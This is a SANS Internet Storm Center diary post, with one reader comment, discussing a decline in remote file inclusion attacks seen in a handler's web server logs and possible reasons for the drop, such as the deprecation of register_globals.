Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: What happened to RFI attacks? SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
What happened to RFI attacks?

Recently, I noticed a remarkable decrease in remote file inclusion attacks against my web servers. Usually, I easily detected 100+ attacks per day using a simple regular expression match. These days, I see maybe a dozen (and they are usually only 2-3 distinct "attacks" meaning different exploits or different attackers.

The number of vulnerabilities exploited also decreased a lot, with many of the older vulnerabilities being no longer probed. 

Have all vulnerable systems been exploited or cleaned up? These attacks where never very effective, and a lot of exploits used would not have been successful even against vulnerable systems. In addition, the attacks where usually launched blindly without recognizance, leading to a lot of hits to non existent pages.

For the few attacks still out there, the pattern doesn't have changed much. I checked out a couple of the payloads and they are either simple indicators or PHP IRC bots.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


3915 Posts
ISC Handler
Mar 7th 2012
Have you noticed the lack of Wordpress spam. A lot of it came from Ubiquity Servers- a VPS provider with servers there was disconnected and all the spam dropped. As for the RFI attacks, what if the new attack is patching RFI vulnerabilities in a system to use it for something else than noisy scanning?
Also, most RFI attacks were "register_globals" specific, which is now deprecated.

Sign Up for Free or Log In to start participating in the conversation!